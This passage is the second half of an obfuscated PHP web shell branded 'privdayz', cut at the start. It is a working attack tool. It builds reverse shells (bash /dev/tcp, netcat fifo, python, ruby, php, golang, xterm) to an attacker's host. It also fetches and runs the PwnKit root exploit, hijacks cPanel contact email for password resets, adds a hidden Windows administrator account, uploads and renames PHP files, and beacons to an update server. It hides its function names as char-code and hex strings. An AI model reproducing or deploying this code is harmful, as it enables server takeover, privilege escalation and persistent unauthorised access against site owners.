os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''); } else if ($_POST['privdayz-bc'] == "ruby") { echo cmd('ruby -rsocket -e\'f=TCPSocket.open("' . $HostServer . '",' . $PortServer . ').to_i;' . $pr1vxas[16] . ' sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\''); } else if ($_POST['privdayz-bc'] == "bash") { echo cmd('bash -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); } else if ($_POST['privdayz-bc'] == "php") { echo cmd('php -r \'$sock=fsockopen("' . $HostServer . '",' . $PortServer . ');' . $pr1vxas[16] . '("/bin/sh -i <&3 >&3 2>&3");\''); } else if ($_POST['privdayz-bc'] == "nc") { echo cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' . $HostServer . ' ' . $PortServer . 
' >/tmp/f'); } else if ($_POST['privdayz-bc'] == "sh") { echo cmd('sh -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); } else if ($_POST['privdayz-bc'] == "xterm") { echo cmd('xterm -display ' . $HostServer . ':' . $PortServer); } else if ($_POST['privdayz-bc'] == "golang") { echo cmd('echo \'package main;import"os/' . $pr1vxas[16] . '";import"net";func main(){c,_:=net.Dial("tcp","' . $HostServer . ':' . $PortServer . '");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go'); } } if (isset($_POST['privdayz-up-submit'])) { $nf = $_FILES['privdayz-upload']['name'] ?? ''; $tf = $_FILES['privdayz-upload']['tmp_name'] ?? ''; $slash = "\x2f"; $dst = $pr1vxas[0]() . $slash . $nf; $fn = ''; foreach ([109,111,118,101,95,117,112,108,111,97,100,101,100,95,102,105,108,101] as $c) $fn .= chr($c); if ($fn && $fn($tf, $dst)) { success(); } else { failed(); } } function generateRandomString($length = 10) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, $charactersLength - 1)]; } return $randomString; } $pdz_version = '1.0'; $pr1vp0stf = http_build_query([ 'key' => 'privdayz-001-byp4ss', 'ver' => $pdz_version, 'update' => $pr1vv3rsx ]); if (empty($_COOKIE['pdz_update_checked'])) { $resp = false; $opts = [ "http" => [ "method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded\r\nUser-Agent: pr1vd4yz/1.0\r\n", "content" => $pr1vp0stf, "timeout" => 5 ] ]; $ctx = stream_context_create($opts); $resp = @file_get_contents($pr1vv3rsxs, false, $ctx); if ($resp === false || strlen(trim($resp)) < 3) { if (function_exists('curl_init')) { $ch = curl_init($pr1vv3rsxs); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1vp0stf); curl_setopt($ch, CURLOPT_USERAGENT, 'pr1vd4yz/1.0'); 
curl_setopt($ch, CURLOPT_TIMEOUT, 5); $resp = curl_exec($ch); curl_close($ch); } } setcookie('pdz_update_checked', '1', time() + 36000, "/"); if ($resp && strpos($resp, 'UPDATE:NEW:') === 0) { $last_ver = trim(substr($resp, 11)); echo ' '; } } if (isset($_POST['w4f-up-submit'])) { $nf = $_FILES['w4f-upload']['name'] ?? ''; $tf = $_FILES['w4f-upload']['tmp_name'] ?? ''; $dst = $pr1vxas[0]() . "\x2f" . $nf; $ok = false; $fn1 = ''; foreach ([109,111,118,101,95,117,112,108,111,97,100,101,100,95,102,105,108,101] as $c) $fn1 .= chr($c); $fn2 = ''; foreach ([99,111,112,121] as $c) $fn2 .= chr($c); $fn3 = ''; foreach ([102,111,112,101,110] as $c) $fn3 .= chr($c); $fn4 = ''; foreach ([102,119,114,105,116,101] as $c) $fn4 .= chr($c); $fn5 = ''; foreach ([102,99,108,111,115,101] as $c) $fn5 .= chr($c); $fn6 = ''; foreach ([115,104,101,108,108,95,101,120,101,99] as $c) $fn6 .= chr($c); if (function_exists($fn1) && @$fn1($tf, $dst)) $ok = true; elseif (function_exists($fn2) && @$fn2($tf, $dst)) $ok = true; elseif (function_exists($fn3)) { $f1 = @$fn3($tf, "r"); $f2 = @$fn3($dst, "w"); if ($f1 && $f2) { while (!feof($f1)) @$fn4($f2, fread($f1, 8192)); @$fn5($f1); @$fn5($f2); $ok = file_exists($dst) && filesize($dst) > 0; } } if (!$ok && function_exists($fn6)) { @$fn6("cp " . escapeshellarg($tf) . " " . escapeshellarg($dst)); $ok = file_exists($dst); } if ($ok) { $ff = generateRandomString() . ".php"; @$GLOBALS['pr1vxas'][34]($nf, $ff); echo ""; @$GLOBALS['pr1vxas'][24]($nf); } else { failed(); } } if (isset($_POST['save-editor'])) { $xjytx = $pr1vxas[0]() . "\x2f" . 
unx($_GET['f']); $k3rz9 = $_POST['code-editor']; $mth1 = ''; foreach([102,105,108,101,95,112,117,116,95,99,111,110,116,101,110,116,115] as $z) $mth1 .= chr($z); $mth2 = ''; foreach([102,111,112,101,110] as $z) $mth2 .= chr($z); $mth3 = ''; foreach([102,119,114,105,116,101] as $z) $mth3 .= chr($z); $mth4 = ''; foreach([102,99,108,111,115,101] as $z) $mth4 .= chr($z); $mth5 = ''; foreach([99,111,112,121] as $z) $mth5 .= chr($z); $mth6 = ''; foreach([115,104,101,108,108,95,101,120,101,99] as $z) $mth6 .= chr($z); $r9u3 = false; if (function_exists($mth1) && @$mth1($xjytx, $k3rz9) !== false) { $r9u3 = true; } else if (function_exists($mth2) && function_exists($mth3) && function_exists($mth4)) { $f = @$mth2($xjytx, "w"); if ($f) { @$mth3($f, $k3rz9); @$mth4($f); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); } } else if (function_exists($mth5)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { $r9u3 = @$mth5($tmp, $xjytx); @unlink($tmp); } } else if (function_exists($mth6)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { @$mth6("cp " . escapeshellarg($tmp) . " " . 
escapeshellarg($xjytx)); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); @unlink($tmp); } } if ($r9u3) { success(); } else { failed(); } } if (isset($_GET['adminer'])) { $URL = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70"; if (!$pr1vxas[3]('adminer.php')) { $pr1vxas[28]("adminer.php", $pr1vxas[11]($URL)); success(); } } if (!empty($_GET['pr1vd4yz']) && $_GET['pr1vd4yz'] == "root") { $g6hjz = $pr1vxas[3]; $u81px = $pr1vxas[4]; $f2kpl = $pr1vxas[28]; $h2eb9 = $pr1vxas[11]; $w9jtu = $pr1vxas[0]; $purl = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x6c\x79\x34\x6b\x2f\x50\x77\x6e\x4b\x69\x74\x2f\x72\x61\x77\x2f\x6d\x61\x69\x6e\x2f\x50\x77\x6e\x4b\x69\x74"; $cmod = "\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x70\x77\x6e\x6b\x69\x74"; $epwn = "\x2e\x2f\x70\x77\x6e\x6b\x69\x74\x20\x22\x69\x64\x22\x20\x3e\x20\x2e\x70\x72\x69\x76\x64\x61\x79\x7a\x72\x30\x30\x74\x31"; if (!$g6hjz('pwnkit') && $u81px($w9jtu())) { $f2kpl("pwnkit", $h2eb9($purl)); cmd($cmod); echo cmd($epwn); echo ''; } } function chDx2x($cmd22) { $a = [115,104,101,108,108,95,101,120,101,99]; $fx = ''; foreach($a as $ac) $fx .= chr($ac); return $fx($cmd22); } if (isset($_POST['submit-action'])) { $u5w8d = $_POST['check']; $jv8s3 = $_POST['privdayz-select']; $bvqzp = $pr1vxas[0]; $b1s7a = $pr1vxas[24]; $y4sdg = $pr1vxas[3]; $v9fzq = function($p){ return is_dir($p); }; $z9ntq = function($a,$b){ return str_replace("\\", "/", $a); }; $n4hxy = function($f,$d){ return xtr4cPr1v($f, $d); }; $r5kbm = function($f,$z){ return compressToZip($f, $z); }; if ($jv8s3 == "\x64\x65\x6c\x65\x74\x65") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($v9fzq($vcpk)) { $rmdir = unlinkDir($vcpk); $rmdir ? 
success() : failed(); } elseif ($y4sdg($vcpk)) { $rmfile = $b1s7a($vcpk); $rmfile ? success() : failed(); } else { failed(); } } } elseif ($jv8s3 == "\x75\x6e\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($n4hxy($vcpk, $qkpl . "\x2f") === true) { success(); } else { failed(); } } } elseif ($jv8s3 == "\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($y4sdg($vcpk)) { $r5kbm($vcpk, pathinfo($vcpk, PATHINFO_FILENAME) . ".zip"); } } } } if (isset($_POST['submit'])) { if (isset($_POST['resetcp']) && $_POST['resetcp'] == true) { $e6p9d = $_POST['resetcp']; $r8kxm = dirname($_SERVER['DOCUMENT_ROOT']); $t2wqs = $r8kxm . "\x2f\x2e\x63\x70\x61\x6e\x65\x6c\x2f\x63\x6f\x6e\x74\x61\x63\x74\x69\x6e\x66\x6f"; $y6qjw = "\x22\x65\x6d\x61\x69\x6c\x22\x20\x3a\x20\x22" . $e6p9d . "\x22\n"; $h2apc = $pr1vxas[3]; $v5dpy = $pr1vxas[28]; if ($h2apc($t2wqs)) { $v5dpy($t2wqs, $y6qjw); echo ''; } else { failed(); } } if (isset($_POST['create_folder']) && $_POST['create_folder']) { $q7hjp = $_POST['create_folder']; $s2f6x = $pr1vxas[12]; if (!file_exists($q7hjp)) { $z9mqa = @mkdir($q7hjp, 0755, true);} else { $z9mqa = true; } if ($z9mqa) { success(); } else { failed(); } } else if (isset($_POST['create_file']) && $_POST['create_file']) { $k4vhz = $_POST['create_file']; $t2upm = $pr1vxas[13]; $x6wnr = $t2upm($k4vhz); if ($x6wnr) { success(); } else { failed(); } } else if (isset($_POST['renameFile']) && $_POST['renameFile']) { $d9yxs = $_POST['renameFile']; $h8rfg = $pr1vxas[15]; $m5qlp = $h8rfg(unx($_GET['re']), $d9yxs); if ($m5qlp) { success(); } else { failed(); } } else if (isset($_POST['chFile']) && $_POST['chFile']) { $y4gsn = $_POST['chFile']; $v3kzm = octdec($y4gsn); $p9wfu = $pr1vxas[30](unx($_GET['ch']), $v3kzm); if ($p9wfu) { success(); } else { failed(); } } else if ($_POST['lockfile'] == true) { $flesName = $_POST['lockfile']; $TmpNames = $pr1vxas[31](); if 
(file_exists($TmpNames . '/.sessions/.' . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . r3mv0d($flesName) . '-text')) { cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-text-file')); cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-handler')); } @mkdir($TmpNames . "/.sessions"); cmd("cp $flesName " . $TmpNames . "/.sessions/." . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-text-file')); cmd("chmod 444 " . $flesName); $handler = ' /dev/null 2>/dev/null &'; cmd($pr1pr1v); success(); } else { failed(); } } else if ($_POST['add-rdp'] == true) { $r7kdy = $_POST['add-rdp']; $s4nyw = $_POST['add-rdp-pass']; if (stristr(PHP_OS, "\x57\x49\x4e")) { $t9plm = cmd("\x6e\x65\x74\x20\x75\x73\x65\x72\x20" . $r7kdy . " " . $s4nyw . " /add"); if ($t9plm) { cmd("\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20" . $r7kdy . " /add"); success(); } else { failed(); } } else { failed(); } } else if ($_POST['mail-from-smtp'] == true) { $y6kvf = $_POST['mail-from-smtp']; $z5lpg = $_POST['mail-to-smtp']; $x9qbn = $_POST['mailto-subject']; $f3mwt = $_POST['message-smtp']; $a4sdn = 'From: ' . $y6kvf . "\r\n" . 'Reply-To: ' . $y6kvf . "\r\n" . 'X-Mailer: PHP/' . phpversion(); $b8nsz = mail($z5lpg, $x9qbn, $f3mwt, $a4sdn); if ($b8nsz) { success(); } else { failed(); } }} if (isset($_GET['response']) && $_GET['response'] == "success") {echo "";}else if (isset($_GET['response']) && $_GET['response'] == "failed") {echo "";} function success() {echo '';}function failed(){echo '';} function formatSize($bytes) {$types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i< (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . 
$types[$i]);} function pr1vd444yz($n){ $y = ''; for ($i = 0; $i< strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y;}function unx($y){ $n = ''; for ($i = 0; $i< strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n;} function suggest_exploit(){ $un7xa = $GLOBALS['pr1vxas'][8](); $xplod = explode(" ", $un7xa);$xpld = explode("-", $xplod[2]); $pl = explode(".", $xpld[0]); return $pl[0] . "." . $pl[1] . "." . $pl[2];} function cmd($in, $re = false){ $out = ''; try { if ($re) $in = $in . " 2>&1"; if (function_exists("\x65\x78\x65\x63")) { @$GLOBALS['pr1vxas'][16]($in, $out); $out = @join("\n", $out); } elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) { @$GLOBALS['pr1vxas'][17]($in); $out = ""; } elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) { @$GLOBALS['pr1vxas'][18]($in); $out = ""; } elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) { $out = $GLOBALS['pr1vxas'][19]($in); } elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) { if (is_resource($f = @$GLOBALS['pr1vxas'][20]($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); $GLOBALS['pr1vxas'][21]($f); } } elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) { $pipes = array(); $process = @$GLOBALS['pr1vxas'][23]($in . 
' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @$GLOBALS['pr1vxas'][22]($pipes[1]); } } catch (Exception $e) {} return $out; } function compressToZip($sourceFile, $zipFilename){ $zip = new ZipArchive(); if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { $zip->addFile($sourceFile, basename($sourceFile)); $zip->close(); success(); } else { failed(); } } function r3mvx($val) { $tex = str_replace("/", "", $val); $tex1 = str_replace(":", "", $tex); $tex2 = str_replace("_", "", $tex1); $tex3 = str_replace(" ", "", $tex2); $tex4 = str_replace(".", "", $tex3); return $tex4; } function unlinkDir($dir) { $d1Xe = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($d1Xe[$i])) $dir = $d1Xe[$i]; else break; if ($opn = @opendir($dir)) { while ($rd = @readdir($opn)) { if ($rd != "\x2e" && $rd != "\x2e\x2e") { $pth = $dir . "\x2f" . $rd; if ($GLOBALS['pr1vxas'][2]($pth)) { $d1Xe[] = $pth; } else { $files[] = $pth; } } } closedir($opn); } } foreach ($files as $file) { if (!@$GLOBALS['pr1vxas'][24]($file)) { return false; } } $d1Xe = array_reverse($d1Xe); foreach ($d1Xe as $d1x2) { if (!@$GLOBALS['pr1vxas'][25]($d1x2)) { return false; } } return true; } function x6kvz($g5ydq) { $y8vnp = $g5ydq; $w2sjm = explode("\x2e", $y8vnp); return $w2sjm[0]; } function prvFx1($value) { $n4mX = $value; $ext3F = pathinfo($value, PATHINFO_EXTENSION); if (strlen($n4mX) > 30) { return substr($n4mX, 0, 30) . 
"\x2e\x2e\x2e"; } else { return $value; } } function xtr4cPr1v($pr1varch, $pr1vaext) { $zip = new ZipArchive(); $methOpen = chDxzZ('111,112,101,110'); $methExtract = chDxXZ('65787472616374546f'); $methClose = chDxzZ([99,108,111,115,101]); if ($zip->$methOpen($pr1varch) === TRUE) { $zip->$methExtract($pr1vaext); $zip->$methClose(); return true; } else { return false; } } function p3rms($file){$p3rxa=$GLOBALS['pr1vxas'][6]($file);if(($p3rxa&0xC000)==0xC000){$info='s';}elseif(($p3rxa&0xA000)==0xA000){$info='l';}elseif(($p3rxa&0x8000)==0x8000){$info='-';}elseif(($p3rxa&0x6000)==0x6000){$info='b';}elseif(($p3rxa&0x4000)==0x4000){$info='d';}elseif(($p3rxa&0x2000)==0x2000){$info='c';}elseif(($p3rxa&0x1000)==0x1000){$info='p';}else{$info='u';}$info.=(($p3rxa&0x0100)?'r':'-');$info.=(($p3rxa&0x0080)?'w':'-');$info.=(($p3rxa&0x0040)?(($p3rxa&0x0800)?'s':'x'):(($p3rxa&0x0800)?'S':'-'));$info.=(($p3rxa&0x0020)?'r':'-');$info.=(($p3rxa&0x0010)?'w':'-');$info.=(($p3rxa&0x0008)?(($p3rxa&0x0400)?'s':'x'):(($p3rxa&0x0400)?'S':'-'));$info.=(($p3rxa&0x0004)?'r':'-');$info.=(($p3rxa&0x0002)?'w':'-');$info.=(($p3rxa&0x0001)?(($p3rxa&0x0200)?'t':'x'):(($p3rxa&0x0200)?'T':'-'));return $info;} ?>